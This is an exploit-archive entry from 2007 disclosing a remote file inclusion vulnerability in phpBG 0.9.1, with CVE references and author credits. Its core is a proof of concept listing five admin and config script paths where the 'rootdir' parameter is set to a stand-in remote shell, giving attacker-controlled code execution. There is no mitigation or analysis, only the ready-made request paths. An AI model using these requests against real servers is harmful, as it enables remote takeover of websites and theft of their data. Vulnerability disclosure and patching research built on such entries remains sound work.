phpBG 0.9.1 - 'rootdir' Remote File Inclusion
| EKU-ID: 12296 | CVE: OSVDB-38433;CVE-2007-4636;OSVDB-38432;OSVDB-38431;OSVDB-38430;OSVDB-38429 | OSVDB-ID: |
| Author: GoLd_M | Published: 2007-08-29 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 12296 | CVE: OSVDB-38433;CVE-2007-4636;OSVDB-38432;OSVDB-38431;OSVDB-38430;OSVDB-38429 | OSVDB-ID: |
| Author: GoLd_M | Published: 2007-08-29 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# phpBG 0.9.1 (rootdir) Remote File Inclusion Vulnerability # D.Script: http://phpbg.sourceforge.net/ # POC: # /intern/admin/other/backup.php?admin=1&rootdir=Shell # /intern/admin/?rootdir=Shell # /intern/clan/member_add.php?rootdir=Shell # /intern/config/key_2.php?rootdir=Shell # /intern/config/forum.php?rootdir=Shell # Discovered by: GoLd_M = [Mahmood_ali] # Thanx To : Tryag-Team & Asbmay's Group & All My Friends # milw0rm.com [2007-08-29]